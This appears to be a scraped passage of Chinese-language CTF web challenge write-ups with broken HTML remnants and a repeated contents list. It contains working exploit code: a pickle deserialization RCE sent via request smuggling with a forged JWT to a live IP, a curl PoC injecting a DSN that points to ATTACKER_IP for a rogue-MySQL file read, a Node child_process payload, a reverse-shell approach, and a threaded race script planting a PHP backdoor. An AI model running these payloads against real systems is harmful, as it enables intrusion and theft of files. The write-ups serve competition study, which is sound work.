import base64, pickle, socket\r\n\r\nclass R(object):\r\n def __reduce__(self):\r\n return (exec, ('index.GET=(lambda x: __import__(\"os\").popen(\"cat \/Secr3T_Flag\").read());', ))\r\n\r\npayload = base64.b64encode(pickle.dumps(R()))\r\n\r\ndata = f'''POST \/admin HTTP\/1.1\r\nHost: python-backend:8080\r\nCookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uL3Byb2Mvc3lzL2tlcm5lbC9vc3R5cGUifQ.eyJ1c2VybmFtZSI6ImEiLCJpc2FkbWluIjp0cnVlfQ.QNAZtiSeedmA7mnPacjjkjBlf3gb5QXXjEy-9USsYAQ\r\nTransfer-Encoding: Chunked\r\nContent-Length: {len(payload)}\r\n\r\n{hex(len(payload))[2:]}\r\n{payload.decode()}\r\n1c\r\nBackdoorPasswordOnlyForAdmin\r\n0\r\n\r\n'''.encode().replace(b'\\r\\n', b'\\n').replace(b'\\n', b'\\r\\n')\r\n\r\nprint(data.decode())\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('47.116.173.108', 31303))\r\n\r\ns.send(data)\r\nprint(s.recv(4096).decode())\r\nprint(s.recv(4096).decode())<\/pre>\n<\/a>\u00a0<\/p>\n
- \n
- web >> Doctor<\/strong><\/span><\/li>\n<\/ul>\n
\u5148\u5ba1\u8ba1\u8def\u7531\u4ee3\u7801\uff0c\u53ef\u4ee5\u770b\u5230 Recorder \u6743\u9650\u68c0\u6d4b\u4e86\u4e00\u4e2a IsWebsocket() \uff0c\u8ddf\u8fdb\u3002<\/p>\n
<\/p>\n\u53ef\u4ee5\u53d1\u73b0\uff0c\u53ea\u662f\u5224\u65ad\u4e86\u4e24\u4e2a HTTP \u8bf7\u6c42\u5934\uff0c\u800c websocket \u7684\u4ea4\u4e92\u8fc7\u7a0b\u9700\u8981\u670d\u52a1\u7aef\u8fd4\u56de 101 \u624d\u80fd\u6b63\u5e38\u5efa\u7acb\u3002\u56e0\u6b64\uff0c\u5e26\u8fd9\u4e24\u4e2a\u5934\u8bf7\u6c42 API \u65f6\uff0c\u53ef\u4ee5\u7ed5\u8fc7 Recorder \u9274\u6743\uff0c\u800c\u4e0d\u5f71\u54cd Endpoint \u63a7\u5236\u5668\u5904\u7406\u6d41\u7a0b\u3002<\/p>\n
<\/p>\n\u6709\u4e00\u70b9\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5728\u8fd9\u79cd\u7ed5\u8fc7\u65b9\u6cd5\u4e0b\uff0c\u63a7\u5236\u5668\u4ee3\u7801\u4e5f\u4e0d\u80fd\u5305\u62ec\u4efb\u4f55\u5bf9\u4e8e jwt \u7684\u89e3\u6790\uff0c\u5426\u5219\u4f1a\u62a5\u9519\uff0c\u65e0\u6cd5\u7ee7\u7eed\u3002<\/p>\n
\u4ece\u4f17\u591a\u7684\u8def\u7531\u4e2d\u8c28\u614e\u5730\u9009\u51fa\u4e86\u4e00\u4e2a\uff0cYearningFetchApis -> FetchResourceForGet -> FetchTableInfo -> FetchTableFieldsOrIndexes<\/p>\n
<\/p>\n\u5176\u4e2d model.CoreDataSource \u5728\u9898\u76ee\u73af\u5883\u4e2d\u4e0d\u5b58\u5728\u76f8\u5e94\u8bb0\u5f55\uff0c\u4e5f\u5c31\u662f\u8bf4\u53ea\u6709 u.DataBase \u53ef\u63a7\u3002<\/p>\n
\u51fd\u6570 NewDBSub() \u4f7f\u7528 sql driver \u6253\u5f00\u4e86 DSN \u8fde\u63a5\uff0cInitDSN() \u6700\u7ec8\u4f1a\u8c03\u7528\u5230 FormatDSN() \u5c06 DSN \u7ed3\u6784\u4f53\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\uff0c\u7ee7\u7eed\u8ddf\u8fdb\u3002<\/p>\n
<\/p>\n\u53ef\u4ee5\u53d1\u73b0\uff0c\u8fd9\u91cc\u76f4\u63a5\u5c06\u6211\u4eec\u53ef\u63a7\u7684 DBName \u5199\u5165\u4e86 connection string \u4e2d\uff0c\u800c\u4e14\u6211\u4eec\u7684\u76ee\u6807\uff0cLOCAL INFILE \u7684\u5f00\u542f\u9009\u9879 allowAllFiles \u5c31\u5728\u5e95\u4e0b\u3002\u5982\u679c\u80fd\u591f\u6784\u9020\u5b57\u7b26\u4e32\u6df7\u6dc6 DSN \u7684\u89e3\u6790\uff0c\u4f7f\u5176\u8fde\u63a5\u5230\u6076\u610f MySQL \u670d\u52a1\u5668\uff0c\u518d\u5f00\u542f\u8fd9\u4e2a\u53c2\u6570\uff0c\u5c31\u53ef\u4ee5\u76f4\u63a5\u8bfb \/flag \u4e86\u3002<\/p>\n
<\/p>\n\u518d\u770b\u89e3\u6790\u6d41\u7a0b\uff0c\u53ef\u4ee5\u53d1\u73b0\u5b83\u662f\u4ece\u540e\u5f80\u524d\u5339\u914d\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u53ef\u4ee5\u5728 dbname \u540e\u63d2\u5165 ‘\/’ \u4ee5\u8986\u76d6\u53c2\u6570\uff0c\u540c\u6837\u63d2\u5165 ‘@’ \u8986\u76d6 net(addr)\uff0c\u7528\u6237\u540d\u4e0d\u53ef\u63a7\uff0c\u4f46\u662f\u8fd9\u4e0d\u91cd\u8981\u3002<\/p>\n
<\/p>\n\u81f3\u6b64\uff0c\u653b\u51fb\u94fe\u5df2\u7ecf\u6784\u9020\u5b8c\u6210\uff0cpoc \u975e\u5e38\u7b80\u5355\uff1a<\/p>\n
curl -vv -H \"Connection: upgrade\" -H \"Upgrade: websocket\" \"http:\/\/106.14.121.29:30167\/api\/v2\/fetch\/fields?data_base=@tcp(ATTACKER_IP:3306)\/db?allowAllFiles=true%26&table=1\"<\/code><\/p>\n<\/p>\n\uff08\u9644\u6ce8\uff1a\u4e00\u76f4\u4e60\u60ef\u5728 github \u4e0a\u7ffb\u6700\u65b0\u7684\u6e90\u4ee3\u7801\uff0c\u9ed8\u8ba4\u5404\u7ec4\u4ef6\u51e0\u4e4e\u90fd\u662f up-to-date \u7684\u3002\u4f46\u662f\u672c Yearning \u5f15\u5165\u7684 go-sql-driver \u7248\u672c\u4e3a 1.7.3\uff0c\u800c\u5982\u4e0b\u7684 issue \u4fee\u590d\u4e86\u8fd9\u4e2a\u95ee\u9898\u3002<\/p>\n
<\/p>\n<\/a>\u00a0<\/p>\n
- \n
- web >> moonbox<\/strong><\/span><\/li>\n<\/ul>\n
\u9996\u5148\u5728 Dockerfile \u91cc\u53ef\u4ee5\u53d1\u73b0 root \u5f31\u5bc6\u7801\u4ee5\u53ca SSH \u5f00\u542f\u3002<\/p>\n
<\/p>\n\u7136\u540e\u7b80\u5355\u5730\u5ba1\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\/api\/console-agent\/fileUpload \u53ef\u4ee5\u4e0a\u4f20 sandbox-agent.tar\uff0c\/api\/record\/run \u53ef\u4ee5\u8fde\u63a5\u5230\u76ee\u6807 SSH \u6267\u884c\u5982\u4e0b\u4ee3\u7801\u7247\u6bb5\uff08
RecordRunController.run() -> AbstractTaskRunService.taskRun() -> AgentDistributionServiceImpl.startAgent() -> startServerAgent()<\/code>\uff09\u3002\u7531\u4e8e tar \u5305\u5185\u5bb9\u6211\u4eec\u53ef\u63a7\uff0c\u76f4\u63a5\u8986\u76d6\u5e95\u4e0b\u90a3\u4e2a start-remote-agent.sh \u8fde\u672c\u673a\u5f39 rev shell \u5373\u53ef\u3002<\/p>\n<\/p>\n<\/a>\u00a0<\/p>\n
- \n
- web >> stack_overflow<\/strong><\/span><\/li>\n<\/ul>\n
\u4ee3\u7801\u6570\u636e\u6df7\u6dc6\uff0c\u7b2c\u4e00\u4e2a read \u5728 23 \u884c\uff0c\u800c\u4e00\u4e0b\u5b50\u53ef\u4ee5\u8bfb\u8fdb\u6765 28 \u884c\uff0c\u8986\u76d6\u63a5\u4e0b\u6765\u7684\u6307\u4ee4\u3002\u6b63\u5219\u7684 waf \u8fc7\u6ee4\u4e0d\u5b8c\u5168\uff0c\u4e24\u4e2a {{ }} \u4e4b\u95f4\u53ef\u4ee5\u4f7f\u7528\u6362\u884c\u7b26\u7ed5\u8fc7\uff0c\u4e14\u4e0d\u5f71\u54cd eval() \u6b63\u5e38\u6267\u884c\u3002\u7136\u540e\u968f\u4fbf\u6784\u9020\u56de\u663e\u5373\u53ef\u3002<\/p>\n
<\/p>\n{\"stdin\":[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"23\",\"24\",\"{{respond[0]=process.mainModule.require('child_process').execSync('cat \/flag').toString()\\n}}\",\"result\",\"write\",\"exit\"]}<\/code><\/p>\n<\/p>\n
\n<\/a>\u00a02023\u5e7411\u6708\u00a0 \u5f3a\u7f51\u62df\u6001\u7ebf\u4e0a<\/span>
\n<\/strong><\/p>\n- \n
- \n
web >> noumisotuitennnoka<\/span>
\n<\/strong><\/p>\n<\/li>\n<\/ul>\n\u6ce8\u610f\u5230\u5148 put_file_contents backdoor.php \u518d .htaccess \uff0c\u5b58\u5728 race condition\uff0c\u5f00\u591a\u4e2a\u7ebf\u7a0b\u7ade\u4e89 create \u8ddf zip\uff0c\u7206\u7387\u5728\u5343\u5206\u4e4b\u4e00\u5de6\u53f3\u3002<\/p>\n
import requests\r\nimport threading\r\nimport random, string, time\r\n\r\nurl = \"http:\/\/URL:PORT\/\"\r\nrequests.get(url)\r\n\r\nbatch = 200\r\nsubdir = ['\/'+''.join(random.choices(string.ascii_lowercase, k=8)) for _ in range(batch)]\r\ndef create(s):\r\n requests.get(url, params={'action': 'clean', 'subdir': s})\r\n def t1():\r\n requests.get(url, params={'action': 'create', 'subdir': s})\r\n print('.', end='', flush=True)\r\n def t2():\r\n requests.get(url, params={'action': 'zip', 'subdir': s})\r\n print('!', end='', flush=True)\r\n threading.Thread(target=t1).start()\r\n threading.Thread(target=t2).start()\r\nfor s in subdir:\r\n threading.Thread(target=create, args=(s,)).start()\r\ntime.sleep(15)\r\nlock = threading.Lock()\r\ndef check(s):\r\n time.sleep(random.random()*10)\r\n requests.get(url, params={'action': 'unzip', 'subdir': s})\r\n res = requests.get(url.rpartition('\/')[0] + '' + s + '\/backdoor.php')\r\n with lock:\r\n if res.status_code in [403, 404]:\r\n print(s, 'fail', res.status_code, flush=True)\r\n else:\r\n print(s, '!!!!', res.text, flush=True)\r\nfor s in subdir:\r\n threading.Thread(target=check, args=(s,)).start()\r\ninput()<\/pre>\n
- \n
- web >> stack_overflow<\/strong><\/span><\/li>\n<\/ul>\n
- web >> moonbox<\/strong><\/span><\/li>\n<\/ul>\n
- web >> Doctor<\/strong><\/span><\/li>\n<\/ul>\n
- \n
- \n
- web >> NinjaClub<\/strong><\/span><\/li>\n<\/ul>\n
- web >> JustMongo
- web >> Modern WordPress
- web >> laravel<\/span><\/strong><\/a><\/li>\n
- web >> ggos<\/span><\/strong><\/a><\/li>\n
- 2023\u5e7410\u6708\u00a0 N1CTF<\/strong><\/span>\n
- \n
- Reverse & Web<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- 2023\u5e7411\u6708\u00a0 HITCTF<\/strong><\/span>\n
- web >> easyjava<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- web >> noumisotuitennnoka<\/span><\/strong><\/a><\/li>\n
- 2023\u5e7411\u6708\u00a0 \u5f3a\u7f51\u62df\u6001\u7ebf\u4e0a<\/strong><\/span>\n
- web >> Doctor<\/span><\/strong><\/a><\/li>\n
- web >> d3pythonhttp<\/span><\/strong><\/a><\/li>\n
- 2024\u5e744\u6708\u00a0 D^3CTF<\/strong><\/span>\n
- \n
- web >> ezldap<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- 2024\u5e745\u6708\u00a0 \u4eac\u9e92CTF<\/strong><\/span>\n
- web >> Modern WordPress<\/span><\/strong><\/a><\/li>\n
- web >> r3php<\/a><\/span><\/strong><\/li>\n